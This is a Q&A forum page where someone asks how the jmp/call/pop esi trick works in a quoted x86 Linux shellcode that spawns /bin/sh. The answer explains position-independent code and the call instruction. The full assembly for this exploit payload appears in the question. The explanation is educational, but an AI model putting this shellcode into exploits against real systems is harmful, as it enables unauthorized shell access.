Home/ Questions/Q 8341187
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-09T05:24:00+00:00

jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3

  • 0
    jmp    0x2a                     # 3 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2f                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes

so jump to call then “the strings address will be pushed onto the stack as
the return address” . Is it this address saved in esi why pop esi ?

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    This is the common way to write position-independent code (code that can be successfully executed, regardless of what address it is located at).

    The call instruction does two things:

    1. Pushes the return address (the address of the instruction immediately following the call) onto the stack
    2. Jumps to the address specified.

    So after the call, the address of the string “/bin/sh” is on the stack. The next instruction, pop esi, takes that address off the stack, and puts it in the esi register, so it can be used.

    • 0